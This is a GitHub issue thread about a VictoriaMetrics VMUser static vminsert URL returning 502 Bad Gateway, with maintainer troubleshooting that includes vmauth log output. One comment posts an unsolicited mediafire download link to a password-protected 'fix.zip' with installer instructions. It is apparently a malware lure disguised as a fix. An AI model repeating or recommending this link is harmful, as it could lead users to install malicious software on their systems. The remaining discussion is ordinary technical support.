### ISSUE TITLE
VMuser targetref using static url with vminsert returns a 502 Bad gateway error and no logs found to debug

### ISSUE THREAD

**Issue by uprashan** [VictoriaMetrics/VictoriaMetrics#6892]
### Describe the bug

Using VMUser to manage access to multi-tenant and using a static vminsert service url as endpoint to ingest returns a 502 Bad gateway. 
    - static:
        url: http://vmcluster-victoria-metrics-cluster-vminsert:8480/
      paths: 
        - "/"
      target_path_suffix: "insert/2620/prometheus"

### To Reproduce

Create a VMUser crd with a Bearer Token for authentication and define an existing vminsert service url to ingest into a specific tenant. Call to the URL fails with 502 bad gateway.

### Version

vmcluster               2               2024-08-22 13:29:12.1566693 +0530 IST   deployed        victoria-metrics-cluster-0.11.23        v1.102.1

vmoperator             1               2024-08-23 11:23:01.981644 +0530 IST    deployed        victoria-metrics-operator-0.34.0        v0.47.0

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zekker6** [comment]
@uprashan Did you check vmauth logs when performing this test?
If vmauth is unable to forward request to the upstream it prints log messages with more details, for example:
```
vmauth 2024-08-28T09:54:44.888Z    warn    VictoriaMetrics/app/vmauth/auth_config.go:372    cannot discover backend IPs for http://vmcluster-victoria-metrics-
cluster-vminsert:8480/insert/2620/prometheus: lookup vmcluster-victoria-metrics-cluster-vminsert on 10.43.0.10:53: no such host; use it literally
vmauth 2024-08-28T09:54:44.893Z    warn    VictoriaMetrics/app/vmauth/main.go:291    remoteAddr: "127.0.0.1:54428"; requestURI: http://vmcluster-victoria-metr
ics-cluster-vminsert:8480/insert/2620/prometheus; retrying the request to http://vmcluster-victoria-metrics-cluster-vminsert:8480/insert/2620/prometheus becau
se of response error: dial tcp4: lookup vmcluster-victoria-metrics-cluster-vminsert on 10.43.0.10:53: no such host; try -enableTCP6 command-line flag for dial
ing ipv6 addresses
vmauth 2024-08-28T09:54:44.893Z    warn    VictoriaMetrics/app/vmauth/main.go:240    remoteAddr: "127.0.0.1:54428"; requestURI: /; all the 1 backends for the
user "bearer_token:hash:4E7A62CBF3428987" are unavailable
vmauth 2024-08-28T09:54:56.460Z    warn    VictoriaMetrics/app/vmauth/auth_config.go:372    cannot discover backend IPs for http://vmcluster-victoria-metrics-
cluster-vminsert:8480/insert/2620/prometheus: lookup vmcluster-victoria-metrics-cluster-vminsert on 10.43.0.10:53: no such host; use it literally
vmauth 2024-08-28T09:54:56.463Z    warn    VictoriaMetrics/app/vmauth/main.go:291    remoteAddr: "127.0.0.1:41312"; requestURI: http://vmcluster-victoria-metr
ics-cluster-vminsert:8480/insert/2620/prometheus; retrying the request to http://vmcluster-victoria-metrics-cluster-vminsert:8480/insert/2620/prometheus becau
se of response error: dial tcp4: lookup vmcluster-victoria-metrics-cluster-vminsert on 10.43.0.10:53: no such host; try -enableTCP6 command-line flag for dial
ing ipv6 addresses
vmauth 2024-08-28T09:54:56.463Z    warn    VictoriaMetrics/app/vmauth/main.go:240    remoteAddr: "127.0.0.1:41312"; requestURI: /; all the 1 backends for the
user "bearer_token:hash:4E7A62CBF3428987" are unavailable
```
In case there were no logs printed by vmauth it might be caused by a loadbalancer/ingress configuration issue where 502 status code was returned prior to request being forwarded to vmauth.

**Comment by uprashan** [comment]
Yes, there were no logs printed on the vmauth pods.

**Comment by zekker6** [comment]
@uprashan In this case I would suggest checking a loadbalancer/ingress configuration which routes request to vmauth. Most likely it returned 502 error as it was not able to route request to vmauth.

**Comment by uprashan** [comment]
Also, Authentication using the VMUser CRD works fine with the bearertoken using the Loadbalancer/ingress.
If I provide the loadbalancer/ingress for the /vminsert path is provided instead of the vminsert service url as static url for the VMUser, the ingestion works fine.
